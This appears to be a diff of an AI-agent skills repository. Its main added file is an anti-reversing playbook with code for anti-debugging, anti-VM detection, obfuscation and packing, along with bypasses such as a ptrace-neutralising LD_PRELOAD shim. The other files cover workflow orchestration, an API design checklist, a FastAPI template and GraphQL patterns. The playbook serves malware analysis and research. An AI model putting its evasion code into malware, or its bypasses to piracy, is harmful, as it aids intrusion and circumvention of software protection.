  "references": [
    "https://angular.dev",
    "https://angular.dev/guide/signals",
    "https://angular.dev/guide/zoneless",
    "https://angular.dev/guide/ssr",
    "https://angular.dev/guide/standalone-components",
    "https://angular.dev/guide/defer"
  ]
}
@@ -3,6 +3,7 @@ name: anti-reversing-techniques
description: "Understand anti-reversing, obfuscation, and protection techniques encountered during software analysis. Use when analyzing protected binaries, bypassing anti-debugging for authorized analysis, or u..."
risk: unknown
source: community
date_added: "2026-02-27"
---

> **AUTHORIZED USE ONLY**: This skill contains dual-use security techniques. Before proceeding with any bypass or analysis:

@@ -0,0 +1,539 @@
|
||||
# Anti-Reversing Techniques Implementation Playbook
|
||||
|
||||
This file contains detailed patterns, checklists, and code samples referenced by the skill.
|
||||
|
||||
# Anti-Reversing Techniques
|
||||
|
||||
Understanding protection mechanisms encountered during authorized software analysis, security research, and malware analysis. This knowledge helps analysts bypass protections to complete legitimate analysis tasks.
|
||||
|
||||
## Anti-Debugging Techniques
|
||||
|
||||
### Windows Anti-Debugging
|
||||
|
||||
#### API-Based Detection
|
||||
|
||||
```c
|
||||
// IsDebuggerPresent
|
||||
if (IsDebuggerPresent()) {
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// CheckRemoteDebuggerPresent
|
||||
BOOL debugged = FALSE;
|
||||
CheckRemoteDebuggerPresent(GetCurrentProcess(), &debugged);
|
||||
if (debugged) exit(1);
|
||||
|
||||
// NtQueryInformationProcess
|
||||
typedef NTSTATUS (NTAPI *pNtQueryInformationProcess)(
|
||||
HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
|
||||
|
||||
DWORD debugPort = 0;
|
||||
NtQueryInformationProcess(
|
||||
GetCurrentProcess(),
|
||||
ProcessDebugPort, // 7
|
||||
&debugPort,
|
||||
sizeof(debugPort),
|
||||
NULL
|
||||
);
|
||||
if (debugPort != 0) exit(1);
|
||||
|
||||
// Debug flags
|
||||
DWORD debugFlags = 0;
|
||||
NtQueryInformationProcess(
|
||||
GetCurrentProcess(),
|
||||
ProcessDebugFlags, // 0x1F
|
||||
&debugFlags,
|
||||
sizeof(debugFlags),
|
||||
NULL
|
||||
);
|
||||
if (debugFlags == 0) exit(1); // 0 means being debugged
|
||||
```
|
||||
|
||||
**Bypass Approaches:**
|
||||
```python
|
||||
# x64dbg: ScyllaHide plugin
|
||||
# Patches common anti-debug checks
|
||||
|
||||
# Manual patching in debugger:
|
||||
# - Set IsDebuggerPresent return to 0
|
||||
# - Patch PEB.BeingDebugged to 0
|
||||
# - Hook NtQueryInformationProcess
|
||||
|
||||
# IDAPython: Patch checks
|
||||
ida_bytes.patch_byte(check_addr, 0x90) # NOP
|
||||
```
|
||||
|
||||

#### PEB-Based Detection

```c
// Direct PEB access
#ifdef _WIN64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif

// BeingDebugged flag
if (peb->BeingDebugged) exit(1);

// NtGlobalFlag
// Debugged: 0x70 (FLG_HEAP_ENABLE_TAIL_CHECK |
//                 FLG_HEAP_ENABLE_FREE_CHECK |
//                 FLG_HEAP_VALIDATE_PARAMETERS)
if (peb->NtGlobalFlag & 0x70) exit(1);

// Heap flags
PDWORD heapFlags = (PDWORD)((PBYTE)peb->ProcessHeap + 0x70);
if (*heapFlags & 0x50000062) exit(1);
```

**Bypass Approaches:**

```assembly
; In debugger, modify PEB directly
; x64dbg: dump at gs:[60] (x64) or fs:[30] (x86)
; Set BeingDebugged (offset 2) to 0
; Clear NtGlobalFlag (offset 0xBC for x64)
```

#### Timing-Based Detection

```c
// RDTSC timing
uint64_t start = __rdtsc();
// ... some code ...
uint64_t end = __rdtsc();
if ((end - start) > THRESHOLD) exit(1);

// QueryPerformanceCounter
LARGE_INTEGER start, end, freq;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&start);
// ... code ...
QueryPerformanceCounter(&end);
double elapsed = (double)(end.QuadPart - start.QuadPart) / freq.QuadPart;
if (elapsed > 0.1) exit(1); // Too slow = debugger

// GetTickCount
DWORD start = GetTickCount();
// ... code ...
if (GetTickCount() - start > 1000) exit(1);
```

**Bypass Approaches:**

```
- Use hardware breakpoints instead of software
- Patch timing checks
- Use VM with controlled time
- Hook timing APIs to return consistent values
```
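
The "hook timing APIs" bypass can be modeled in plain Python: if the protected code reads time through a replaceable clock, a hook that reports a frozen time makes any debugger-induced delay invisible. A minimal sketch; `THRESHOLD` and the workload are illustrative stand-ins, not values from a real target.

```python
import time

THRESHOLD = 0.05  # seconds; illustrative cutoff, not from a real target

def timing_check(clock=time.monotonic):
    """Return True when the protected region ran 'fast enough' (no debugger)."""
    start = clock()
    _ = sum(i * i for i in range(10_000))  # stand-in for the protected code
    return (clock() - start) <= THRESHOLD

def make_frozen_clock(value=0.0):
    """Hooked clock: always reports the same instant, so elapsed time is zero."""
    return lambda: value
```

Single-stepping through `timing_check` with the real clock would blow past `THRESHOLD`; swapping in the frozen clock, as ScyllaHide-style hooks do for `QueryPerformanceCounter`, makes the check pass unconditionally.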

#### Exception-Based Detection

```c
// SEH-based detection
__try {
    __asm { int 3 }  // Software breakpoint
}
__except(EXCEPTION_EXECUTE_HANDLER) {
    // Normal execution: exception caught
    return;
}
// Debugger ate the exception
exit(1);

// VEH-based detection
LONG CALLBACK VectoredHandler(PEXCEPTION_POINTERS ep) {
    if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
        ep->ContextRecord->Rip++;  // Skip INT3
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}
```

### Linux Anti-Debugging

```c
// ptrace self-trace
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
    // Already being traced
    exit(1);
}

// /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
char line[256];
while (fgets(line, sizeof(line), f)) {
    if (strncmp(line, "TracerPid:", 10) == 0) {
        int tracer_pid = atoi(line + 10);
        if (tracer_pid != 0) exit(1);
    }
}

// Parent process check
if (getppid() != 1 && strcmp(get_process_name(getppid()), "bash") != 0) {
    // Unusual parent (might be debugger)
}
```

**Bypass Approaches:**

```c
// hook.c -- LD_PRELOAD shim that neutralizes ptrace-based checks
// Compile: gcc -shared -fPIC -o hook.so hook.c
long ptrace(int request, ...) {
    return 0;  // Always succeed
}
```

```bash
# Usage
LD_PRELOAD=./hook.so ./target
```
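
The same `TracerPid` check is handy in Python when scripting Linux triage. A sketch that parses the text of `/proc/self/status` (on a live system, read it with `open("/proc/self/status").read()`):

```python
def tracer_pid(status_text: str) -> int:
    """Extract the TracerPid field from /proc/<pid>/status content (0 = not traced)."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    return 0  # field missing: treat as untraced
```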

## Anti-VM Detection

### Hardware Fingerprinting

```c
// CPUID-based detection
int cpuid_info[4];
__cpuid(cpuid_info, 1);
// Check hypervisor bit (bit 31 of ECX)
if (cpuid_info[2] & (1 << 31)) {
    // Running in hypervisor
}

// CPUID brand string
__cpuid(cpuid_info, 0x40000000);
char vendor[13] = {0};
memcpy(vendor, &cpuid_info[1], 12);
// "VMwareVMware", "Microsoft Hv", "KVMKVMKVM", "VBoxVBoxVBox"

// MAC address prefix
// VMware: 00:0C:29, 00:50:56
// VirtualBox: 08:00:27
// Hyper-V: 00:15:5D
```
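
For triage tooling, the MAC-prefix heuristic maps directly onto a lookup table. A sketch (the OUI prefixes come from the comments above and are not exhaustive):

```python
from typing import Optional

# Known VM MAC OUIs from the list above (not exhaustive)
VM_MAC_PREFIXES = {
    "00:0c:29": "VMware",
    "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5d": "Hyper-V",
}

def vm_vendor_from_mac(mac: str) -> Optional[str]:
    """Normalize a MAC address and look up its first three octets."""
    prefix = mac.lower().replace("-", ":")[:8]
    return VM_MAC_PREFIXES.get(prefix)
```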

### Registry/File Detection

```c
// Windows registry keys
// HKLM\SOFTWARE\VMware, Inc.\VMware Tools
// HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
// HKLM\HARDWARE\ACPI\DSDT\VBOX__

// Files
// C:\Windows\System32\drivers\vmmouse.sys
// C:\Windows\System32\drivers\vmhgfs.sys
// C:\Windows\System32\drivers\VBoxMouse.sys

// Processes
// vmtoolsd.exe, vmwaretray.exe
// VBoxService.exe, VBoxTray.exe
```

### Timing-Based VM Detection

```c
// VM exits cause timing anomalies
uint64_t start = __rdtsc();
__cpuid(cpuid_info, 0);  // Causes VM exit
uint64_t end = __rdtsc();
if ((end - start) > 500) {
    // Likely in VM (CPUID takes longer)
}
```

**Bypass Approaches:**

```
- Use bare-metal analysis environment
- Harden VM (remove guest tools, change MAC)
- Patch detection code
- Use specialized analysis VMs (FLARE-VM)
```
## Code Obfuscation

### Control Flow Obfuscation

#### Control Flow Flattening

```c
// Original
if (cond) {
    func_a();
} else {
    func_b();
}
func_c();

// Flattened
int state = 0;
while (1) {
    switch (state) {
    case 0:
        state = cond ? 1 : 2;
        break;
    case 1:
        func_a();
        state = 3;
        break;
    case 2:
        func_b();
        state = 3;
        break;
    case 3:
        func_c();
        return;
    }
}
```

**Analysis Approach:**

- Identify state variable
- Map state transitions
- Reconstruct original flow
- Tools: D-810 (IDA), SATURN
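
The recovery idea can be sketched by replaying the dispatcher: once the state variable and its transition map are known, walking the switch in order yields the original block sequence. A toy model of the flattened example above (block names are the placeholder functions from the C snippet):

```python
# state -> (action, next-state function); next=None marks the exit state,
# mirroring the switch in the flattened C example
DISPATCH = {
    0: (None, lambda cond: 1 if cond else 2),
    1: ("func_a", lambda cond: 3),
    2: ("func_b", lambda cond: 3),
    3: ("func_c", None),
}

def recover_trace(cond):
    """Replay the flattened dispatcher to recover the linear block order."""
    state, trace = 0, []
    while state is not None:
        action, nxt = DISPATCH[state]
        if action:
            trace.append(action)
        state = nxt(cond) if nxt else None
    return trace
```

Running both branches recovers the original `if/else` followed by `func_c`, which is exactly the reconstruction a deflattening pass aims to automate.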

#### Opaque Predicates

```c
// Always true, but complex to analyze
int x = rand();
if ((x * x) >= 0) {  // Always true
    real_code();
} else {
    junk_code();  // Dead code
}

// Always false
if ((x * (x + 1)) % 2 == 1) {  // Product of consecutive = even
    junk_code();
}
```

**Analysis Approach:**

- Identify constant expressions
- Symbolic execution to prove predicates
- Pattern matching for known opaque predicates
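
Short of full symbolic execution, a cheap sampling heuristic already flags most textbook opaque predicates: evaluate the candidate over many inputs and see whether it is constant. A sketch (a constant result over samples is evidence, not proof; angr or Triton can actually prove it):

```python
def prove_constant(pred, samples=range(-1000, 1000)):
    """Return the constant value if pred is constant over the samples, else None."""
    values = {pred(x) for x in samples}
    return values.pop() if len(values) == 1 else None
```

Applied to the examples above, `x * x >= 0` samples as always true, the consecutive-product test as always false, and a genuine condition like `x > 0` as non-constant.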

### Data Obfuscation

#### String Encryption

```c
// XOR encryption
char *decrypt_string(char *enc, int len, char key) {
    char *dec = malloc(len + 1);
    for (int i = 0; i < len; i++) {
        dec[i] = enc[i] ^ key;
    }
    dec[len] = 0;
    return dec;
}

// Stack strings
char url[20];
url[0] = 'h'; url[1] = 't'; url[2] = 't'; url[3] = 'p';
url[4] = ':'; url[5] = '/'; url[6] = '/';
// ...
```

**Analysis Approach:**

```bash
# FLOSS for automatic string deobfuscation
floss malware.exe
```

```python
# IDAPython string decryption
def decrypt_xor(ea, length, key):
    result = ""
    for i in range(length):
        byte = ida_bytes.get_byte(ea + i)
        result += chr(byte ^ key)
    return result
```
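
Outside IDA, single-byte XOR keys are small enough to brute-force directly. A standalone sketch that keeps only candidate keys whose output is printable ASCII (the sample ciphertext is fabricated for illustration):

```python
def xor_bruteforce(blob: bytes, min_len: int = 4):
    """Try every single-byte XOR key; keep keys whose output is printable ASCII."""
    hits = []
    for key in range(1, 256):
        out = bytes(b ^ key for b in blob)
        if len(out) >= min_len and all(32 <= c < 127 for c in out):
            hits.append((key, out.decode("ascii")))
    return hits
```

Expect some false positives (several keys can yield printable junk); in practice you rank hits by keyword matches such as `http` or `.dll`.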

#### API Obfuscation

```c
// Dynamic API resolution
typedef HANDLE (WINAPI *pCreateFileW)(LPCWSTR, DWORD, DWORD,
    LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);

HMODULE kernel32 = LoadLibraryA("kernel32.dll");
pCreateFileW myCreateFile = (pCreateFileW)GetProcAddress(
    kernel32, "CreateFileW");

// API hashing
DWORD hash_api(char *name) {
    DWORD hash = 0;
    while (*name) {
        hash = ((hash >> 13) | (hash << 19)) + *name++;
    }
    return hash;
}
// Resolve by hash comparison instead of string
```

**Analysis Approach:**

- Identify hash algorithm
- Build hash database of known APIs
- Use HashDB plugin for IDA
- Dynamic analysis to resolve at runtime
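
To build such a hash database, the C routine above ports directly to Python: a 13-bit rotate on a 32-bit value, then add each byte. Precompute hashes for known export names, then look up the constants recovered from the binary:

```python
def hash_api(name: str) -> int:
    """Python port of the C hash above: 32-bit rotate-right-13, then add each byte."""
    h = 0
    for ch in name.encode("ascii"):
        h = (((h >> 13) | (h << 19)) & 0xFFFFFFFF) + ch
        h &= 0xFFFFFFFF  # keep DWORD semantics
    return h

# Precomputed database: hash -> export name (extend with a full export list)
HASH_DB = {hash_api(n): n for n in ["CreateFileW", "LoadLibraryA", "GetProcAddress"]}
```

In a real workflow you would hash every export of the DLLs the sample loads, then resolve each hardcoded constant via `HASH_DB.get(const)`.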

### Instruction-Level Obfuscation

#### Dead Code Insertion

```asm
; Original
mov eax, 1

; With dead code
push ebx        ; Dead
mov eax, 1
pop ebx         ; Dead
xor ecx, ecx    ; Dead
add ecx, ecx    ; Dead
```

#### Instruction Substitution

```asm
; Original: xor eax, eax (set to 0)
; Substitutions:
sub eax, eax
mov eax, 0
and eax, 0
lea eax, [0]

; Original: mov eax, 1
; Substitutions:
xor eax, eax
inc eax

push 1
pop eax
```

## Packing and Encryption

### Common Packers

```
UPX       - Open source, easy to unpack
Themida   - Commercial, VM-based protection
VMProtect - Commercial, code virtualization
ASPack    - Compression packer
PECompact - Compression packer
Enigma    - Commercial protector
```

### Unpacking Methodology

```
1. Identify packer (DIE, Exeinfo PE, PEiD)

2. Static unpacking (if known packer):
   - UPX: upx -d packed.exe
   - Use existing unpackers

3. Dynamic unpacking:
   a. Find Original Entry Point (OEP)
   b. Set breakpoint on OEP
   c. Dump memory when OEP reached
   d. Fix import table (Scylla, ImpREC)

4. OEP finding techniques:
   - Hardware breakpoint on stack (ESP trick)
   - Break on common API calls (GetCommandLineA)
   - Trace and look for typical entry patterns
```

### Manual Unpacking Example

```
1. Load packed binary in x64dbg
2. Note entry point (packer stub)
3. Use ESP trick:
   - Run to entry
   - Set hardware breakpoint on [ESP]
   - Run until breakpoint hits (after PUSHAD/POPAD)
4. Look for JMP to OEP
5. At OEP, use Scylla to:
   - Dump process
   - Find imports (IAT autosearch)
   - Fix dump
```

## Virtualization-Based Protection

### Code Virtualization

```
Original x86 code is converted to custom bytecode
interpreted by an embedded VM at runtime.

Original:          VM Protected:
mov eax, 1         push vm_context
add eax, 2         call vm_entry
                   ; VM interprets bytecode
                   ; equivalent to original
```

### Analysis Approaches

```
1. Identify VM components:
   - VM entry (dispatcher)
   - Handler table
   - Bytecode location
   - Virtual registers/stack

2. Trace execution:
   - Log handler calls
   - Map bytecode to operations
   - Understand instruction set

3. Lifting/devirtualization:
   - Map VM instructions back to native
   - Tools: VMAttack, SATURN, NoVmp

4. Symbolic execution:
   - Analyze VM semantically
   - angr, Triton
```

## Bypass Strategies Summary

### General Principles

1. **Understand the protection**: Identify what technique is used
2. **Find the check**: Locate protection code in the binary
3. **Patch or hook**: Modify the check to always pass
4. **Use appropriate tools**: ScyllaHide, x64dbg plugins
5. **Document findings**: Keep notes on bypassed protections

### Tool Recommendations

```
Anti-debug bypass:  ScyllaHide, TitanHide
Unpacking:          x64dbg + Scylla, OllyDumpEx
Deobfuscation:      D-810, SATURN, miasm
VM analysis:        VMAttack, NoVmp, manual tracing
String decryption:  FLOSS, custom scripts
Symbolic execution: angr, Triton
```

### Ethical Considerations

This knowledge should only be used for:

- Authorized security research
- Malware analysis (defensive)
- CTF competitions
- Understanding protections for legitimate purposes
- Educational purposes

Never use to bypass protections for:

- Software piracy
- Unauthorized access
- Malicious purposes
81
web-app/public/skills/antigravity-workflows/SKILL.md
Normal file
@@ -0,0 +1,81 @@
---
name: antigravity-workflows
description: "Orchestrate multiple Antigravity skills through guided workflows for SaaS MVP delivery, security audits, AI agent builds, and browser QA."
risk: none
source: self
date_added: "2026-02-27"
---
# Antigravity Workflows

Use this skill to turn a complex objective into a guided sequence of skill invocations.

## When to Use This Skill

Use this skill when:

- The user wants to combine several skills without manually selecting each one.
- The goal is multi-phase (for example: plan, build, test, ship).
- The user asks for best-practice execution for common scenarios like:
  - Shipping a SaaS MVP
  - Running a web security audit
  - Building an AI agent system
  - Implementing browser automation and E2E QA

## Workflow Source of Truth

Read workflows in this order:

1. `docs/WORKFLOWS.md` for human-readable playbooks.
2. `data/workflows.json` for machine-readable workflow metadata.

## How to Run This Skill

1. Identify the user's concrete outcome.
2. Propose the 1-2 best matching workflows.
3. Ask the user to choose one.
4. Execute step-by-step:
   - Announce the current step and expected artifact.
   - Invoke recommended skills for that step.
   - Verify completion criteria before moving to the next step.
5. At the end, provide:
   - Completed artifacts
   - Validation evidence
   - Remaining risks and next actions

## Default Workflow Routing

- Product delivery request -> `ship-saas-mvp`
- Security review request -> `security-audit-web-app`
- Agent/LLM product request -> `build-ai-agent-system`
- E2E/browser testing request -> `qa-browser-automation`
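
An implementation that automated this routing would reduce the table to a dictionary lookup. A hypothetical sketch (the request-kind labels are illustrative; only the workflow ids come from the list above):

```python
# Hypothetical routing table; workflow ids match the list above
ROUTES = {
    "product delivery": "ship-saas-mvp",
    "security review": "security-audit-web-app",
    "agent/llm product": "build-ai-agent-system",
    "e2e/browser testing": "qa-browser-automation",
}

def route(request_kind: str) -> str:
    """Map a request category to a workflow id; unknown kinds fall back to asking."""
    return ROUTES.get(request_kind.strip().lower(), "ask-user-to-choose")
```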

## Copy-Paste Prompts

```text
Use @antigravity-workflows to run the "Ship a SaaS MVP" workflow for my project idea.
```

```text
Use @antigravity-workflows and execute a full "Security Audit for a Web App" workflow.
```

```text
Use @antigravity-workflows to guide me through "Build an AI Agent System" with checkpoints.
```

```text
Use @antigravity-workflows to execute the "QA and Browser Automation" workflow and stabilize flaky tests.
```

## Limitations

- This skill orchestrates; it does not replace specialized skills.
- It depends on the local availability of referenced skills.
- It does not guarantee success without environment access, credentials, or required infrastructure.
- For stack-specific browser automation in Go, `go-playwright` may require the corresponding skill to be present in your local skills repository.

## Related Skills

- `concise-planning`
- `brainstorming`
- `workflow-automation`
- `verification-before-completion`
@@ -0,0 +1,36 @@

# Antigravity Workflows Implementation Playbook

This document explains how an agent should execute workflow-based orchestration.

## Execution Contract

For every workflow:

1. Confirm objective and scope.
2. Select the best-matching workflow.
3. Execute workflow steps in order.
4. Produce one concrete artifact per step.
5. Validate before continuing.

## Step Artifact Examples

- Plan step -> scope document or milestone checklist.
- Build step -> code changes and implementation notes.
- Test step -> test results and failure triage.
- Release step -> rollout checklist and risk log.

## Safety Guardrails

- Never run destructive actions without explicit user approval.
- If a required skill is missing, state the gap and fall back to the closest available skill.
- When security testing is involved, ensure authorization is explicit.

## Suggested Completion Format

At workflow completion, return:

1. Completed steps
2. Artifacts produced
3. Validation evidence
4. Open risks
5. Suggested next action
@@ -3,6 +3,7 @@ name: api-design-principles
description: "Master REST and GraphQL API design principles to build intuitive, scalable, and maintainable APIs that delight developers. Use when designing new APIs, reviewing API specifications, or establishing..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Design Principles
@@ -0,0 +1,155 @@

# API Design Checklist

## Pre-Implementation Review

### Resource Design

- [ ] Resources are nouns, not verbs
- [ ] Plural names for collections
- [ ] Consistent naming across all endpoints
- [ ] Clear resource hierarchy (avoid deep nesting >2 levels)
- [ ] All CRUD operations properly mapped to HTTP methods

### HTTP Methods

- [ ] GET for retrieval (safe, idempotent)
- [ ] POST for creation
- [ ] PUT for full replacement (idempotent)
- [ ] PATCH for partial updates
- [ ] DELETE for removal (idempotent)

### Status Codes

- [ ] 200 OK for successful GET/PATCH/PUT
- [ ] 201 Created for POST
- [ ] 204 No Content for DELETE
- [ ] 400 Bad Request for malformed requests
- [ ] 401 Unauthorized for missing auth
- [ ] 403 Forbidden for insufficient permissions
- [ ] 404 Not Found for missing resources
- [ ] 422 Unprocessable Entity for validation errors
- [ ] 429 Too Many Requests for rate limiting
- [ ] 500 Internal Server Error for server issues

### Pagination

- [ ] All collection endpoints paginated
- [ ] Default page size defined (e.g., 20)
- [ ] Maximum page size enforced (e.g., 100)
- [ ] Pagination metadata included (total, pages, etc.)
- [ ] Cursor-based or offset-based pattern chosen
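
The pagination-metadata item above amounts to one ceiling division. A sketch of the response block (the field names follow one common convention, not a standard):

```python
import math

def pagination_meta(total: int, page: int, page_size: int) -> dict:
    """Metadata block for a paginated collection response."""
    return {
        "total": total,
        "page": page,
        "page_size": page_size,
        "pages": math.ceil(total / page_size) if total else 0,
    }
```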

### Filtering & Sorting

- [ ] Query parameters for filtering
- [ ] Sort parameter supported
- [ ] Search parameter for full-text search
- [ ] Field selection supported (sparse fieldsets)

### Versioning

- [ ] Versioning strategy defined (URL/header/query)
- [ ] Version included in all endpoints
- [ ] Deprecation policy documented

### Error Handling

- [ ] Consistent error response format
- [ ] Detailed error messages
- [ ] Field-level validation errors
- [ ] Error codes for client handling
- [ ] Timestamps in error responses

### Authentication & Authorization

- [ ] Authentication method defined (Bearer token, API key)
- [ ] Authorization checks on all endpoints
- [ ] 401 vs 403 used correctly
- [ ] Token expiration handled

### Rate Limiting

- [ ] Rate limits defined per endpoint/user
- [ ] Rate limit headers included
- [ ] 429 status code for exceeded limits
- [ ] Retry-After header provided
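
A minimal token-bucket sketch shows how the 429/Retry-After items fit together server-side; `rate` and `capacity` are illustrative values, and the injectable clock exists only to make the example deterministic:

```python
import time

class TokenBucket:
    """Minimal token-bucket limiter: `rate` tokens/sec, burst of `capacity`."""

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate, self.capacity = rate, capacity
        self.tokens = float(capacity)
        self.clock = clock
        self.last = clock()

    def allow(self) -> bool:
        now = self.clock()
        # Refill proportionally to elapsed time, capped at capacity
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # caller should respond 429 with a Retry-After header
```

When `allow()` returns `False`, the handler returns 429 and can set `Retry-After` to the time until the next token refill (`(1 - tokens) / rate` seconds).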

### Documentation

- [ ] OpenAPI/Swagger spec generated
- [ ] All endpoints documented
- [ ] Request/response examples provided
- [ ] Error responses documented
- [ ] Authentication flow documented

### Testing

- [ ] Unit tests for business logic
- [ ] Integration tests for endpoints
- [ ] Error scenarios tested
- [ ] Edge cases covered
- [ ] Performance tests for heavy endpoints

### Security

- [ ] Input validation on all fields
- [ ] SQL injection prevention
- [ ] XSS prevention
- [ ] CORS configured correctly
- [ ] HTTPS enforced
- [ ] Sensitive data not in URLs
- [ ] No secrets in responses

### Performance

- [ ] Database queries optimized
- [ ] N+1 queries prevented
- [ ] Caching strategy defined
- [ ] Cache headers set appropriately
- [ ] Large responses paginated

### Monitoring

- [ ] Logging implemented
- [ ] Error tracking configured
- [ ] Performance metrics collected
- [ ] Health check endpoint available
- [ ] Alerts configured for errors

## GraphQL-Specific Checks

### Schema Design

- [ ] Schema-first approach used
- [ ] Types properly defined
- [ ] Non-null vs nullable decided
- [ ] Interfaces/unions used appropriately
- [ ] Custom scalars defined

### Queries

- [ ] Query depth limiting
- [ ] Query complexity analysis
- [ ] DataLoaders prevent N+1
- [ ] Pagination pattern chosen (Relay/offset)

### Mutations

- [ ] Input types defined
- [ ] Payload types with errors
- [ ] Optimistic response support
- [ ] Idempotency considered

### Performance

- [ ] DataLoader for all relationships
- [ ] Query batching enabled
- [ ] Persisted queries considered
- [ ] Response caching implemented

### Documentation

- [ ] All fields documented
- [ ] Deprecations marked
- [ ] Examples provided
- [ ] Schema introspection enabled
@@ -0,0 +1,182 @@

"""
Production-ready REST API template using FastAPI.
Includes pagination, filtering, error handling, and best practices.
"""

from fastapi import FastAPI, HTTPException, Query, Path, Depends, status
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from fastapi.responses import JSONResponse
from pydantic import BaseModel, Field, EmailStr, ConfigDict
from typing import Optional, List, Any
from datetime import datetime
from enum import Enum

app = FastAPI(
    title="API Template",
    version="1.0.0",
    docs_url="/api/docs"
)

# Security Middleware
# Trusted Host: Prevents HTTP Host Header attacks
app.add_middleware(
    TrustedHostMiddleware,
    allowed_hosts=["*"]  # TODO: Configure this in production, e.g. ["api.example.com"]
)

# CORS: Configures Cross-Origin Resource Sharing
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # TODO: Update this with specific origins in production
    allow_credentials=False,  # TODO: Set to True if you need cookies/auth headers, but restrict origins
    allow_methods=["*"],
    allow_headers=["*"],
)

# Models
class UserStatus(str, Enum):
    ACTIVE = "active"
    INACTIVE = "inactive"
    SUSPENDED = "suspended"

class UserBase(BaseModel):
    email: EmailStr
    name: str = Field(..., min_length=1, max_length=100)
    status: UserStatus = UserStatus.ACTIVE

class UserCreate(UserBase):
    password: str = Field(..., min_length=8)

class UserUpdate(BaseModel):
    email: Optional[EmailStr] = None
    name: Optional[str] = Field(None, min_length=1, max_length=100)
    status: Optional[UserStatus] = None

class User(UserBase):
    id: str
    created_at: datetime
    updated_at: datetime

    model_config = ConfigDict(from_attributes=True)

# Pagination
class PaginationParams(BaseModel):
    page: int = Field(1, ge=1)
    page_size: int = Field(20, ge=1, le=100)

class PaginatedResponse(BaseModel):
    items: List[Any]
    total: int
    page: int
    page_size: int
    pages: int

# Error handling
class ErrorDetail(BaseModel):
    field: Optional[str] = None
    message: str
    code: str

class ErrorResponse(BaseModel):
    error: str
    message: str
    details: Optional[List[ErrorDetail]] = None

@app.exception_handler(HTTPException)
async def http_exception_handler(request, exc):
    return JSONResponse(
        status_code=exc.status_code,
        content=ErrorResponse(
            error=exc.__class__.__name__,
            message=exc.detail if isinstance(exc.detail, str) else exc.detail.get("message", "Error"),
            details=exc.detail.get("details") if isinstance(exc.detail, dict) else None
        ).model_dump()
    )

# Endpoints
@app.get("/api/users", response_model=PaginatedResponse, tags=["Users"])
async def list_users(
    page: int = Query(1, ge=1),
    page_size: int = Query(20, ge=1, le=100),
    status: Optional[UserStatus] = Query(None),
    search: Optional[str] = Query(None)
):
    """List users with pagination and filtering."""
    # Mock implementation
    total = 100
    items = [
        User(
            id=str(i),
            email=f"user{i}@example.com",
            name=f"User {i}",
            status=UserStatus.ACTIVE,
            created_at=datetime.now(),
            updated_at=datetime.now()
        ).model_dump()
        for i in range((page - 1) * page_size, min(page * page_size, total))
    ]

    return PaginatedResponse(
        items=items,
        total=total,
        page=page,
        page_size=page_size,
        pages=(total + page_size - 1) // page_size
    )

@app.post("/api/users", response_model=User, status_code=status.HTTP_201_CREATED, tags=["Users"])
async def create_user(user: UserCreate):
    """Create a new user."""
    # Mock implementation
    return User(
        id="123",
        email=user.email,
        name=user.name,
        status=user.status,
        created_at=datetime.now(),
        updated_at=datetime.now()
    )

@app.get("/api/users/{user_id}", response_model=User, tags=["Users"])
async def get_user(user_id: str = Path(..., description="User ID")):
    """Get user by ID."""
    # Mock: Check if exists
    if user_id == "999":
        raise HTTPException(
            status_code=status.HTTP_404_NOT_FOUND,
            detail={
                "message": "User not found",
                # Shape matches ErrorResponse.details (a list of ErrorDetail)
                "details": [{"field": "id", "message": f"No user with id {user_id}", "code": "not_found"}]
            }
        )

    return User(
        id=user_id,
        email="user@example.com",
        name="User Name",
        status=UserStatus.ACTIVE,
        created_at=datetime.now(),
        updated_at=datetime.now()
    )

@app.patch("/api/users/{user_id}", response_model=User, tags=["Users"])
async def update_user(user_id: str, update: UserUpdate):
    """Partially update user."""
    # Validate user exists
    existing = await get_user(user_id)

    # Apply updates
    update_data = update.model_dump(exclude_unset=True)
    for field, value in update_data.items():
        setattr(existing, field, value)

    existing.updated_at = datetime.now()
    return existing

@app.delete("/api/users/{user_id}", status_code=status.HTTP_204_NO_CONTENT, tags=["Users"])
async def delete_user(user_id: str):
    """Delete user."""
    await get_user(user_id)  # Verify exists
    return None

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host="0.0.0.0", port=8000)
@@ -0,0 +1,583 @@

# GraphQL Schema Design Patterns

## Schema Organization

### Modular Schema Structure

```graphql
# user.graphql
type User {
  id: ID!
  email: String!
  name: String!
  posts: [Post!]!
}

extend type Query {
  user(id: ID!): User
  users(first: Int, after: String): UserConnection!
}

extend type Mutation {
  createUser(input: CreateUserInput!): CreateUserPayload!
}

# post.graphql
type Post {
  id: ID!
  title: String!
  content: String!
  author: User!
}

extend type Query {
  post(id: ID!): Post
}
```
## Type Design Patterns

### 1. Non-Null Types

```graphql
type User {
  id: ID!          # Always required
  email: String!   # Required
  phone: String    # Optional (nullable)
  posts: [Post!]!  # Non-null array of non-null posts
  tags: [String!]  # Nullable array of non-null strings
}
```

### 2. Interfaces for Polymorphism

```graphql
interface Node {
  id: ID!
  createdAt: DateTime!
}

type User implements Node {
  id: ID!
  createdAt: DateTime!
  email: String!
}

type Post implements Node {
  id: ID!
  createdAt: DateTime!
  title: String!
}

type Query {
  node(id: ID!): Node
}
```

### 3. Unions for Heterogeneous Results

```graphql
union SearchResult = User | Post | Comment

type Query {
  search(query: String!): [SearchResult!]!
}

# Query example
{
  search(query: "graphql") {
    ... on User {
      name
